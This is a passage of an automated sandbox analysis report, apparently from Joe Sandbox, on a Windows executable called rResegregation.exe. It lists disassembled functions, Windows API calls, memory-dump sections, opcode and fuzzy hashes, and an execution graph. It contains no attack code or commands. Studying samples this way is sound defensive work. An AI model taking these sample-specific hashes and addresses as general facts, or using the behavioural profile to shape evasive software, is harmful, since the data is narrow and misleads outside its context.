                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                  • Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
                                                                  • Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                  • Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404E99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                    • Part of subcall function 00403F3D: SendMessageA.USER32(000103C0,00000000,00000000,00000000), ref: 00403F4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                  • Instruction ID: 1c3aa9a2031039442b6cd3bdc360fce63fd7b644e996c38402bdeea248e73ffc
                                                                  • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                  • Instruction Fuzzy Hash: 2D0171B1104249AFDF219F51DC80A5B3A25E7C4755F104037FB00762D1D33AAD619B6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004035F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,76483410,00000000,C:\Users\user\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
                                                                  • GlobalFree.KERNEL32(00C2CAE8), ref: 00403618
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004035F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-3355392842
                                                                  • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                  • Instruction ID: f0c2977cb20e6558c2e773556eb83bc0584892ec035bd6653f77e23ad75a478d
                                                                  • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                  • Instruction Fuzzy Hash: 1DE0C233905120ABC6315F44FE0472A7B7CAF48B22F020067EC447B3A087786C528BCC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004057C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 004057CB
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 004057D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-3370423016
                                                                  • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                  • Instruction ID: d39d8f188df628cf061828239c0557f0f3bbaa41193ad9941d070ee56f497fe5
                                                                  • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                  • Instruction Fuzzy Hash: E5D0A772408D706EF30352109C04B8F6A48CF26300F090463F040A3191C27C5D424BBE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004058E4 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                  • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                  • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                  • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                  • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:19.5%
                                                                  Total number of Nodes:118
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 63355 377ac170 649 API calls 63227 377b1f70 385 API calls 63228 377da370 365 API calls 63356 377e4d70 LdrInitializeThunk 63229 377daf72 392 API calls 63360 377e716d 8 API calls 63230 37833f9f 9 API calls 63361 377e7960 367 API calls 63363 377e415f 366 API calls 63233 377ebb5b 367 API calls 63365 377bb950 586 API calls 63236 377ea350 456 API calls 63367 377e8d4f 388 API calls 63239 377aa740 450 API calls 63368 377ac140 372 API calls 63369 377ce547 623 API calls 63243 37831fc9 647 API calls 63374 377cd530 364 API calls 63375 377ea130 10 API calls 63377 377e1527 369 API calls 63248 377abf20 388 API calls 63249 37856bde 630 API calls 63250 377e8322 613 API calls 63251 377eab20 377 API calls 63252 377ecb20 379 API calls 63379 377e8520 10 API calls 63218 377f2b20 63220 377f2b2a 63218->63220 63221 377f2b3f LdrInitializeThunk 63220->63221 63222 377f2b31 63220->63222 63382 377fad20 10 API calls 63257 377dc310 369 API calls 63259 377dcb10 GetPEB GetPEB GetPEB GetPEB 63391 377e5900 368 API calls 63265 377a73f0 7 API calls 63266 3783330c 366 API calls 63268 37869313 14 API calls 63397 377de9e0 384 API calls 63398 3783c51d 9 API calls 63399 377e69e0 222 API calls 63270 3783db2a 14 API calls 63271 377a9fd0 364 API calls 63402 377ac1d0 367 API calls 63272 377b3bd0 24 API calls 63404 377ec5c6 612 API calls 63275 377ae3c0 439 API calls 63276 377abfc0 12 API calls 63405 377a81c0 213 API calls 63407 377b1dc0 24 API calls 63408 377c51c0 415 API calls 63277 377e87c0 364 API calls 63278 37883336 213 API calls 63279 377ebbc0 584 API calls 63280 377e8fbc 388 API calls 63414 377eb9b0 11 API calls 63415 377ae9ac 649 API calls 63417 377a7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 63285 377e43a0 391 API calls 63418 377a8196 9 API calls 63288 377e9790 442 API calls 63223 377f2b90 LdrInitializeThunk 63424 377e9580 618 API calls 63297 377ece70 385 API calls 63299 377ab260 384 API calls 63429 377a7060 RtlDebugPrintTimes 63430 377a7860 214 API calls 63431 377b3c60 26 API calls 63301 37832e9f 416 API calls 63434 377cc850 613 API calls 63436 377f9450 9 API calls 63308 377b3640 377 API calls 63309 377dea40 393 API calls 63310 377ef240 368 API calls 63311 377f6e40 8 API calls 63314 377b2e32 388 API calls 63315 377a7a30 384 API calls 63442 377ab830 610 API calls 63317 377e7a33 803 API calls 63318 377e6e30 10 API calls 63443 377e0030 363 API calls 63445 377b2022 17 API calls 63320 377ab620 215 API calls 63446 377ab420 214 API calls 63322 377a821b 393 API calls 63323 377a9610 614 API calls 63450 377b2410 659 API calls 63451 377b9810 620 API calls 63452 377f2010 10 API calls 63454 377aec0b 649 API calls 63455 377a640d 617 API calls 63328 377a6e00 RtlDebugPrintTimes RtlDebugPrintTimes 63329 377dd600 783 API calls 63459 377dacf0 373 API calls 63460 377dccf0 GetPEB GetPEB 63331 377e96f0 370 API calls 63332 377e62f0 662 API calls 63333 377b3ee2 23 API calls 63334 377a72e0 363 API calls 63463 377b58e0 874 API calls 63335 377d66e0 461 API calls 63465 377e54e0 213 API calls 63467 377df4d0 376 API calls 63470 377ab0c0 456 API calls 63471 377e6cc0 370 API calls 63339 377a82b0 365 API calls 63341 377abea0 375 API calls 63342 377b06a0 392 API calls 63475 377b00a0 621 API calls 63344 377ecea0 412 API calls 63476 377ae0a4 392 API calls 63346 377f22a0 799 API calls 63347 377aa290 580 API calls 63348 377afe90 14 API calls 63477 377ac090 388 API calls 63349 377bc690 GetPEB 63350 377cd690 10 API calls 63479 377eb890 411 API calls 63352 377dbe80 364 API calls

                                                                  Executed Functions

                                                                  Function 377F34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6 377f34e0-377f34ec LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 317ca65dc5e93b657e3d53c6ca43abec9954ee7935d08f244430100c1374e51a
                                                                  • Instruction ID: 38cb2c2994cb3d825ed68285cc656f1cc152be7732087a4397f080cdcfa60b0a
                                                                  • Opcode Fuzzy Hash: 317ca65dc5e93b657e3d53c6ca43abec9954ee7935d08f244430100c1374e51a
                                                                  • Instruction Fuzzy Hash: 2890027160550422D50061584A14706100547E0301F61CC16A0414568EC7A5899979A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5 377f2d10-377f2d1c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3503a85cc39b5c394de84c87f1ec6725fe36a8ddeb87a7793a08f73f46957011
                                                                  • Instruction ID: 578184eaf369905027431e6678e3754d00ca99858743911aa1de80af3a631c94
                                                                  • Opcode Fuzzy Hash: 3503a85cc39b5c394de84c87f1ec6725fe36a8ddeb87a7793a08f73f46957011
                                                                  • Instruction Fuzzy Hash: 4F90027120140433D51161584A04707000947E0341F91CC17A0414558ED666899AB521
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4 377f2b90-377f2b9c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 81c4847d3947d2b1866a0eb7313f22dacd40ab5434bbbc129e218148e545a27c
                                                                  • Instruction ID: 13dbc790182ef7e4286910071db445026c0a55bf8d90e8bba8ff810736786f60
                                                                  • Opcode Fuzzy Hash: 81c4847d3947d2b1866a0eb7313f22dacd40ab5434bbbc129e218148e545a27c
                                                                  • Instruction Fuzzy Hash: 4D90027120148822D5106158890474A000547E0301F55CC16A4414658EC6A588D97521
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 377f2b2a-377f2b2f 1 377f2b3f-377f2b46 LdrInitializeThunk 0->1 2 377f2b31-377f2b38 0->2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b814a1c9bf028ac1cb15b3294388412fbaea6cbe3b89b44247b9bc81d390a678
                                                                  • Instruction ID: fc052c57c05a69f59caed12307002300c2fee68b79577915f12e69ca0cdc40a9
                                                                  • Opcode Fuzzy Hash: b814a1c9bf028ac1cb15b3294388412fbaea6cbe3b89b44247b9bc81d390a678
                                                                  • Instruction Fuzzy Hash: DFB09B719054C5D5E601D7604B0870B790167D1751F15C856D1460691F4739C4D5F575
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 377E8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 767 377e8540-377e85a1 768 378250a2-378250a8 767->768 769 377e85a7-377e85b8 767->769 768->769 770 378250ae-378250bb GetPEB 768->770 770->769 771 378250c1-378250c4 770->771 772 378250e1-37825107 call 377f2c00 771->772 773 378250c6-378250d0 771->773 772->769 779 3782510d-37825111 772->779 773->769 774 378250d6-378250df 773->774 776 37825138-3782514c call 377b53c0 774->776 782 37825152-3782515e 776->782 779->769 781 37825117-3782512c call 377f2c00 779->781 781->769 790 37825132 781->790 784 37825367-37825373 call 37825378 782->784 785 37825164-37825178 782->785 784->769 788 37825196-3782520c 785->788 789 3782517a 785->789 795 37825245-37825248 788->795 796 3782520e-37825240 call 377afcf0 788->796 792 3782517c-37825183 789->792 790->776 792->788 794 37825185-37825187 792->794 799 37825189-3782518c 794->799 800 3782518e-37825190 794->800 797 3782524e-3782529f 795->797 798 3782531f-37825322 795->798 809 37825358-3782535d call 3783a130 796->809 806 378252a1-378252d7 call 377afcf0 797->806 807 378252d9-3782531d call 377afcf0 * 2 797->807 803 37825360-37825362 798->803 804 37825324-37825353 call 377afcf0 798->804 799->792 800->788 800->803 803->782 804->809 806->809 807->809 809->803
                                                                  Strings
                                                                  • Critical section debug info address, xrefs: 3782522A, 37825339
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 37825215, 378252A1, 37825324
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 3782534E
                                                                  • double initialized or corrupted critical section, xrefs: 37825313
                                                                  • undeleted critical section in freed memory, xrefs: 37825236
                                                                  • Thread identifier, xrefs: 37825345
                                                                  • Invalid debug info address of this critical section, xrefs: 378252C1
                                                                  • Critical section address., xrefs: 3782530D
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 378252ED
                                                                  • 8, xrefs: 378250EE
                                                                  • Address of the debug info found in the active list., xrefs: 378252B9, 37825305
                                                                  • corrupted critical section, xrefs: 378252CD
                                                                  • Critical section address, xrefs: 37825230, 378252C7, 3782533F
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 378252D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: cc803e7e17ceae554c5b13989ba4a3abc6df401f6b2e2dc38d07662dbeb3b10f
                                                                  • Instruction ID: 988c2c608ce19e7402123282b5f841daba01b219b3843b9927322c1c53ce1823
                                                                  • Opcode Fuzzy Hash: cc803e7e17ceae554c5b13989ba4a3abc6df401f6b2e2dc38d07662dbeb3b10f
                                                                  • Instruction Fuzzy Hash: F1818DB1A42348AFEB10CF95C844BEEBBB9FF09710F2041A9F904BB680D775A945DB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
